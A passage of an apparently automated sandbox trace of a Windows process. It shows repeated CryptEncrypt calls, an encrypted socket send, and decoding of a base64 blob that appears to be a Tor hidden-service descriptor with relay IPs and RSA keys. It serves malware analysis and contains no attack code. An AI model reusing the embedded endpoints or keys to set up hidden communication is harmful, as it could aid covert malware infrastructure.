(_Size=0x1fd) returned 0x3d81e60 [0157.153] free (_Block=0x0) [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.153] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.154] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.155] malloc (_Size=0x1fd) returned 0x3def218 [0157.155] free (_Block=0x0) [0157.156] free (_Block=0x3def010) [0157.156] free (_Block=0x3d81e60) [0157.156] free (_Block=0x606108) [0157.156] malloc (_Size=0x202) returned 0x606108 [0157.156] free (_Block=0x0) [0157.156] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f334, MessageSeqNo=0x0 | out: pMessage=0x316f334) returned 0x0 [0157.156] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0157.156] free (_Block=0x606108) [0157.156] free (_Block=0x60e2f0) [0157.157] free (_Block=0x3def218) [0157.157] Sleep (dwMilliseconds=0xa) [0157.170] Sleep (dwMilliseconds=0xa) [0157.190] Sleep (dwMilliseconds=0xa) [0157.203] Sleep (dwMilliseconds=0xa) [0157.220] Sleep (dwMilliseconds=0xa) [0157.364] Sleep (dwMilliseconds=0xa) [0157.453] Sleep (dwMilliseconds=0xa) [0157.616] free (_Block=0x3f69ce0) [0157.616] malloc (_Size=0xd72) returned 0x60cdc0 [0157.616] free (_Block=0x0) [0157.616] Sleep (dwMilliseconds=0xa) [0157.717] free (_Block=0x0) [0157.717] malloc (_Size=0xcba) returned 0x3f68010 [0157.717] free (_Block=0x0) [0157.717] free (_Block=0x60cdc0) [0157.717] free (_Block=0x60e018) [0157.717] free (_Block=0x3648e90) [0157.718] malloc (_Size=0xcba) returned 0x60cdc0 [0157.718] free (_Block=0x0) [0157.718] malloc (_Size=0x3f) returned 0x3e22308 [0157.718] free (_Block=0x0) [0157.718] malloc (_Size=0x40) returned 0x3e220c8 [0157.719] free (_Block=0x0) [0157.719] free (_Block=0x0) [0157.719] memchr (_Buf=0x60cdff, _Val=10, _MaxCount=0xc7a) returned 0x60ce08 [0157.719] malloc (_Size=0xa) returned 0x3648d88 [0157.719] free (_Block=0x0) [0157.719] free (_Block=0x0) [0157.719] memchr (_Buf=0x60ce09, _Val=10, _MaxCount=0xc70) returned 0x60ce16 [0157.719] malloc (_Size=0xe) returned 0x3648ea8 [0157.719] free (_Block=0x0) [0157.719] free (_Block=0x0) [0157.719] memchr (_Buf=0x60ce17, _Val=10, _MaxCount=0xc62) returned 0x60ce35 [0157.719] malloc (_Size=0x1f) returned 0x3d80080 [0157.719] free (_Block=0x0) [0157.719] free (_Block=0x0) [0157.719] memchr (_Buf=0x60ce36, _Val=10, _MaxCount=0xc43) returned 0x60ce76 [0157.719] malloc (_Size=0x41) returned 0x60eb48 [0157.719] free (_Block=0x0) [0157.720] malloc (_Size=0x140) returned 0x3dd4648 [0157.720] free (_Block=0x3e220c8) [0157.720] free (_Block=0x0) [0157.720] memchr (_Buf=0x60ce77, _Val=10, _MaxCount=0xc02) returned 0x60ceb7 [0157.720] malloc (_Size=0x41) returned 0x60ebe8 [0157.720] free (_Block=0x0) [0157.720] free (_Block=0x0) [0157.720] memchr (_Buf=0x60ceb8, _Val=10, _MaxCount=0xbc1) returned 0x60cef4 [0157.720] malloc (_Size=0x3d) returned 0x3e222c0 [0157.720] free (_Block=0x0) [0157.720] free (_Block=0x0) [0157.720] memchr (_Buf=0x60cef5, _Val=10, _MaxCount=0xb84) returned 0x60cf11 [0157.720] malloc (_Size=0x1d) returned 0x3d802d8 [0157.720] free (_Block=0x0) [0157.720] free (_Block=0x0) [0157.720] memchr (_Buf=0x60cf12, _Val=10, _MaxCount=0xb67) returned 0x60cf41 [0157.720] malloc (_Size=0x30) returned 0x36249f8 [0157.720] free (_Block=0x0) [0157.721] free (_Block=0x0) [0157.721] memchr (_Buf=0x60cf42, _Val=10, _MaxCount=0xb37) returned 0x60cf66 [0157.721] malloc (_Size=0x25) returned 0x60de88 [0157.721] free (_Block=0x0) [0157.721] free (_Block=0x0) [0157.721] memchr (_Buf=0x60cf67, _Val=10, _MaxCount=0xb12) returned 0x60cf7c [0157.721] malloc (_Size=0x16) returned 0x3f65140 [0157.721] free (_Block=0x0) [0157.721] free (_Block=0x0) [0157.721] memchr (_Buf=0x60cf7d, _Val=10, _MaxCount=0xafc) returned 0x60cf90 [0157.721] malloc (_Size=0x14) returned 0x3f652c0 [0157.721] free (_Block=0x0) [0157.721] free (_Block=0x0) [0157.721] memchr (_Buf=0x60cf91, _Val=10, _MaxCount=0xae8) returned 0x60cfa8 [0157.721] malloc (_Size=0x18) returned 0x3f65440 [0157.721] free (_Block=0x0) [0157.721] free (_Block=0x0) [0157.721] memchr (_Buf=0x60cfa9, _Val=10, _MaxCount=0xad0) returned 0x60cfe9 [0157.721] malloc (_Size=0x41) returned 0x60e878 [0157.721] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60cfea, _Val=10, _MaxCount=0xa8f) returned 0x60d02a [0157.722] malloc (_Size=0x41) returned 0x60e8c8 [0157.722] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60d02b, _Val=10, _MaxCount=0xa4e) returned 0x60d06b [0157.722] malloc (_Size=0x41) returned 0x60e918 [0157.722] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60d06c, _Val=10, _MaxCount=0xa0d) returned 0x60d0ac [0157.722] malloc (_Size=0x41) returned 0x60e788 [0157.722] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60d0ad, _Val=10, _MaxCount=0x9cc) returned 0x60d0ed [0157.722] malloc (_Size=0x41) returned 0x60ea58 [0157.722] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60d0ee, _Val=10, _MaxCount=0x98b) returned 0x60d12e [0157.722] malloc (_Size=0x41) returned 0x60eaa8 [0157.722] free (_Block=0x0) [0157.722] free (_Block=0x0) [0157.722] memchr (_Buf=0x60d12f, _Val=10, _MaxCount=0x94a) returned 0x60d16f [0157.723] malloc (_Size=0x41) returned 0x60eaf8 [0157.723] free (_Block=0x0) [0157.723] free (_Block=0x0) [0157.723] memchr (_Buf=0x60d170, _Val=10, _MaxCount=0x909) returned 0x60d1b0 [0157.723] malloc (_Size=0x41) returned 0x60ee18 [0157.723] free (_Block=0x0) [0157.723] malloc (_Size=0x540) returned 0x3def010 [0157.723] free (_Block=0x3dd4648) [0157.723] free (_Block=0x0) [0157.723] memchr (_Buf=0x60d1b1, _Val=10, _MaxCount=0x8c8) returned 0x60d1f1 [0157.723] malloc (_Size=0x41) returned 0x60ecd8 [0157.723] free (_Block=0x0) [0157.723] free (_Block=0x0) [0157.723] memchr (_Buf=0x60d1f2, _Val=10, _MaxCount=0x887) returned 0x60d232 [0157.723] malloc (_Size=0x41) returned 0x60edc8 [0157.723] free (_Block=0x0) [0157.723] free (_Block=0x0) [0157.723] memchr (_Buf=0x60d233, _Val=10, _MaxCount=0x846) returned 0x60d273 [0157.723] malloc (_Size=0x41) returned 0x60eb98 [0157.723] free (_Block=0x0) [0157.723] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d274, _Val=10, _MaxCount=0x805) returned 0x60d2b4 [0157.724] malloc (_Size=0x41) returned 0x60ee68 [0157.724] free (_Block=0x0) [0157.724] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d2b5, _Val=10, _MaxCount=0x7c4) returned 0x60d2f5 [0157.724] malloc (_Size=0x41) returned 0x60e6e8 [0157.724] free (_Block=0x0) [0157.724] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d2f6, _Val=10, _MaxCount=0x783) returned 0x60d336 [0157.724] malloc (_Size=0x41) returned 0x60e9b8 [0157.724] free (_Block=0x0) [0157.724] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d337, _Val=10, _MaxCount=0x742) returned 0x60d377 [0157.724] malloc (_Size=0x41) returned 0x60e7d8 [0157.724] free (_Block=0x0) [0157.724] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d378, _Val=10, _MaxCount=0x701) returned 0x60d3b8 [0157.724] malloc (_Size=0x41) returned 0x60e738 [0157.724] free (_Block=0x0) [0157.724] free (_Block=0x0) [0157.724] memchr (_Buf=0x60d3b9, _Val=10, _MaxCount=0x6c0) returned 0x60d3f9 [0157.725] malloc (_Size=0x41) returned 0x60ed28 [0157.725] free (_Block=0x0) [0157.725] free (_Block=0x0) [0157.725] memchr (_Buf=0x60d3fa, _Val=10, _MaxCount=0x67f) returned 0x60d43a [0157.725] malloc (_Size=0x41) returned 0x60ec88 [0157.725] free (_Block=0x0) [0157.725] free (_Block=0x0) [0157.725] memchr (_Buf=0x60d43b, _Val=10, _MaxCount=0x63e) returned 0x60d47b [0157.725] malloc (_Size=0x41) returned 0x60e828 [0157.725] free (_Block=0x0) [0157.725] free (_Block=0x0) [0157.725] memchr (_Buf=0x60d47c, _Val=10, _MaxCount=0x5fd) returned 0x60d4bc [0157.725] malloc (_Size=0x41) returned 0x60ec38 [0157.725] free (_Block=0x0) [0157.725] free (_Block=0x0) [0157.725] memchr (_Buf=0x60d4bd, _Val=10, _MaxCount=0x5bc) returned 0x60d4fd [0157.725] malloc (_Size=0x41) returned 0x60e968 [0157.725] free (_Block=0x0) [0157.725] free (_Block=0x0) [0157.725] memchr (_Buf=0x60d4fe, _Val=10, _MaxCount=0x57b) returned 0x60d53e [0157.726] malloc (_Size=0x41) returned 0x60ed78 [0157.726] free (_Block=0x0) [0157.726] free (_Block=0x0) [0157.726] memchr (_Buf=0x60d53f, _Val=10, _MaxCount=0x53a) returned 0x60d57f [0157.726] malloc (_Size=0x41) returned 0x60ea08 [0157.726] free (_Block=0x0) [0157.726] free (_Block=0x0) [0157.726] memchr (_Buf=0x60d580, _Val=10, _MaxCount=0x4f9) returned 0x60d5c0 [0157.726] malloc (_Size=0x41) returned 0x3defef0 [0157.726] free (_Block=0x0) [0157.726] free (_Block=0x0) [0157.726] memchr (_Buf=0x60d5c1, _Val=10, _MaxCount=0x4b8) returned 0x60d601 [0157.726] malloc (_Size=0x41) returned 0x3deff90 [0157.726] free (_Block=0x0) [0157.726] free (_Block=0x0) [0157.726] memchr (_Buf=0x60d602, _Val=10, _MaxCount=0x477) returned 0x60d642 [0157.726] malloc (_Size=0x41) returned 0x3deff40 [0157.726] free (_Block=0x0) [0157.726] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d643, _Val=10, _MaxCount=0x436) returned 0x60d683 [0157.727] malloc (_Size=0x41) returned 0x3defe00 [0157.727] free (_Block=0x0) [0157.727] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d684, _Val=10, _MaxCount=0x3f5) returned 0x60d6c4 [0157.727] malloc (_Size=0x41) returned 0x3defd60 [0157.727] free (_Block=0x0) [0157.727] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d6c5, _Val=10, _MaxCount=0x3b4) returned 0x60d705 [0157.727] malloc (_Size=0x41) returned 0x3defe50 [0157.727] free (_Block=0x0) [0157.727] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d706, _Val=10, _MaxCount=0x373) returned 0x60d746 [0157.727] malloc (_Size=0x41) returned 0x3defdb0 [0157.727] free (_Block=0x0) [0157.727] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d747, _Val=10, _MaxCount=0x332) returned 0x60d787 [0157.727] malloc (_Size=0x41) returned 0x3defc20 [0157.727] free (_Block=0x0) [0157.727] free (_Block=0x0) [0157.727] memchr (_Buf=0x60d788, _Val=10, _MaxCount=0x2f1) returned 0x60d7c8 [0157.728] malloc (_Size=0x41) returned 0x3deffe0 [0157.728] free (_Block=0x0) [0157.728] free (_Block=0x0) [0157.728] memchr (_Buf=0x60d7c9, _Val=10, _MaxCount=0x2b0) returned 0x60d809 [0157.728] malloc (_Size=0x41) returned 0x3defea0 [0157.728] free (_Block=0x0) [0157.728] free (_Block=0x0) [0157.728] memchr (_Buf=0x60d80a, _Val=10, _MaxCount=0x26f) returned 0x60d84a [0157.728] malloc (_Size=0x41) returned 0x3defa90 [0157.728] free (_Block=0x0) [0157.728] free (_Block=0x0) [0157.728] memchr (_Buf=0x60d84b, _Val=10, _MaxCount=0x22e) returned 0x60d88b [0157.728] malloc (_Size=0x41) returned 0x3df0030 [0157.728] free (_Block=0x0) [0157.728] free (_Block=0x0) [0157.728] memchr (_Buf=0x60d88c, _Val=10, _MaxCount=0x1ed) returned 0x60d8cc [0157.728] malloc (_Size=0x41) returned 0x3df0080 [0157.728] free (_Block=0x0) [0157.728] free (_Block=0x0) [0157.728] memchr (_Buf=0x60d8cd, _Val=10, _MaxCount=0x1ac) returned 0x60d90d [0157.729] malloc (_Size=0x41) returned 0x3defd10 [0157.729] free (_Block=0x0) [0157.729] free (_Block=0x0) [0157.729] memchr (_Buf=0x60d90e, _Val=10, _MaxCount=0x16b) returned 0x60d94e [0157.729] malloc (_Size=0x41) returned 0x3def900 [0157.729] free (_Block=0x0) [0157.729] free (_Block=0x0) [0157.729] memchr (_Buf=0x60d94f, _Val=10, _MaxCount=0x12a) returned 0x60d977 [0157.729] malloc (_Size=0x29) returned 0x3624a30 [0157.729] free (_Block=0x0) [0157.729] free (_Block=0x0) [0157.729] memchr (_Buf=0x60d978, _Val=10, _MaxCount=0x101) returned 0x60d98d [0157.729] malloc (_Size=0x16) returned 0x3f65280 [0157.729] free (_Block=0x0) [0157.729] free (_Block=0x0) [0157.729] memchr (_Buf=0x60d98e, _Val=10, _MaxCount=0xeb) returned 0x60d997 [0157.729] malloc (_Size=0xa) returned 0x3648de8 [0157.729] free (_Block=0x0) [0157.729] free (_Block=0x0) [0157.729] memchr (_Buf=0x60d998, _Val=10, _MaxCount=0xe1) returned 0x60d9b1 [0157.729] malloc (_Size=0x1a) returned 0x3d80198 [0157.730] free (_Block=0x0) [0157.730] free (_Block=0x0) [0157.730] memchr (_Buf=0x60d9b2, _Val=10, _MaxCount=0xc7) returned 0x60d9f2 [0157.730] malloc (_Size=0x41) returned 0x3def950 [0157.730] free (_Block=0x0) [0157.730] free (_Block=0x0) [0157.730] memchr (_Buf=0x60d9f3, _Val=10, _MaxCount=0x86) returned 0x60da33 [0157.730] malloc (_Size=0x41) returned 0x3def9a0 [0157.730] free (_Block=0x0) [0157.730] free (_Block=0x0) [0157.730] memchr (_Buf=0x60da34, _Val=10, _MaxCount=0x45) returned 0x60da60 [0157.730] malloc (_Size=0x2d) returned 0x3624838 [0157.730] free (_Block=0x0) [0157.730] free (_Block=0x0) [0157.730] memchr (_Buf=0x60da61, _Val=10, _MaxCount=0x18) returned 0x60da78 [0157.730] malloc (_Size=0x18) returned 0x3f65300 [0157.730] free (_Block=0x0) [0157.730] free (_Block=0x0) [0157.731] free (_Block=0x60cdc0) [0157.731] malloc (_Size=0x41) returned 0x3defb80 [0157.731] free (_Block=0x0) [0157.731] malloc (_Size=0x81) returned 0x60ca40 [0157.731] free (_Block=0x3defb80) [0157.731] malloc (_Size=0xc1) returned 0x3692610 [0157.731] free (_Block=0x60ca40) [0157.731] malloc (_Size=0x121) returned 0x606108 [0157.731] free (_Block=0x3692610) [0157.731] malloc (_Size=0x181) returned 0x3f69828 [0157.731] free (_Block=0x606108) [0157.731] malloc (_Size=0x241) returned 0x606108 [0157.731] free (_Block=0x3f69828) [0157.731] malloc (_Size=0x361) returned 0x3def558 [0157.732] free (_Block=0x606108) [0157.732] malloc (_Size=0x4e1) returned 0x60cdc0 [0157.732] free (_Block=0x3def558) [0157.732] malloc (_Size=0x721) returned 0x60d2b0 [0157.732] free (_Block=0x60cdc0) [0157.732] malloc (_Size=0xa81) returned 0x3f69ce0 [0157.732] free (_Block=0x60d2b0) [0157.732] CryptStringToBinaryA (in: pszString="aW50cm9kdWN0aW9uLXBvaW50IHBzc3R5bmd5eTRieG5pbGRyM3Qyc25maHptYnpzMjdjCmlwLWFkZHJlc3MgODAuMjExLjUzLjQ0Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQUtQeDdXK1dWekpXN1RvTGJTMnlhQzY2NEFZSmJaV0kySm9EMVlhQWxPVXlQYmdhaEhPMFNKU0sKNjJRQUdGdFdkc1RMV3cwZTl1RnhBNkJ1NHU0bHRXOW5WQVdkSXlUL2lpV3pCRjFZVVFqb3ZkMkZMbWV3dDhaZApsV2JreWpCTW9uT1J2UXBiQzJrejRWVGYzb0tNYWhnRlFMZXhJZFlBOFpYNU9Bak5WSVBaQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTd5MnFXN1k3T3Z2REJ2RFIzWGtJUzlaMTAyR3NtcnVzSEFTNjNlVkRubTVyK3ZHSVU4NjljNgpMcWVYYmI2eERncmgvQ09PMWtxdmYyVHg1M01RdDFLbk9acUMzdlM3S2U3cUJVaVo0V04wMlQ3djdubjlxMFBIClhJZmpUTS9RYWVPR3dSWkIxdmF1S0pnOTlmTDhlQVVyaUdEeWhHQTIxMExzSGNJM1pTNlRBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2ludCBmdHV3dmNxNXVhemdtdGVxNnYyazc2N200Z2ZnNWRwNAppcC1hZGRyZXNzIDg5LjE2My4xMjguMjgKb25pb24tcG9ydCA5MDAxCm9uaW9uLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBT2dYa0NMcDlobEVtazVvcUc3K0V2RGREbGRQdUxrTWZLcFBKQkhNQ1pydFBWYUxEbTJHSzJ4NQpnZEYvQWJvTWgxcURJSk5lQmo3VVVSZnFEZWYvZXY5OVhFVGJPbUUwNDNhU3BaVzAzNnlFUnQvcTVpaGc4R2tBCjY2cGFHRE1GQ2M3c0lIT3ptb3ZTVzZCQ3hqZHp6cHk4TWhRdEx1Rk5aNHZlWmlNdWpXa2RBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCnNlcnZpY2Uta2V5Ci0tLS0tQkVHSU4gUlNBIFBVQkxJQyBLRVktLS0tLQpNSUdKQW9HQkFMOXYvNzViWkh6a2tDQW5XdThrWWd4U1dmYnJmOE9tcTJEb3FFdC9zVlBhcTl0NllqWVBmWUowClRZanhpbnNhT05CSFRlWHhkNnFnYVc2ZEZaczFSMENFZDJhRlJNVHdFWDRtM3h5Q2hGd2ZkTkdjblVaS1ZNanEKY2E3RDVzSE1CYlc4R2VMR2ZBUTdiOHRyOXJrMEM5TU5hejVYY3Z0Z1hKdFNBdDl5c2pkVkFnTUJBQUU9Ci0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0KaW50cm9kdWN0aW9uLXBvaW50IHpxdzVyY2JqdDNsM3BzdDVwb2pxZ3V2YW90djZkMmlnCmlwLWFkZHJlc3MgMTk1LjE1NC4xMTIuMjI4Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU1EK1MwZ3psWUV6OGRrVzhwOHlxLy9CQmJ2cDQ2UURtT2RpNUVtcjNtY1U5TFFQSnVsaW1iRDcKTkpJMkkzZWNYT251THZqNGc2K0ZoQmR0enRXY3M4ZmFGRzdhWWhnN1FiSTJrVVYrL0dVWDUxejhDSFg0UWMwVwoxMlBoRHoxNFNYc2dET01OU2oxcXpOYlZweGlYbmcxZlpBTDNQamZybFJrVmVINVF4ZE1MQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTE1SDdEYU1SK1RneWFFNFNGZ3hNZGUwem54aWNPZ01lVzVrUEFlOFA3U3dtR0V2R1FraXdqSApKNTQrZ0FxeWdrUXBDNURNY0hIaVZ1Y1RTWXZqY254dFA4Z1hOc1I1ajNmNTBHQk9ZLzdFdlBMdmFteWh2SzJsCm5FR0xKWnVHUUlRRlAzRXNYMEgwL0syU3B3Y2htYWNxbVM4U1RIL2dRRVFTZjVXTjY4REZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=", cchString=0x9a8, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f450, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f450, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.732] malloc (_Size=0x73d) returned 0x60cdc0 [0157.732] free (_Block=0x0) [0157.732] CryptStringToBinaryA (in: 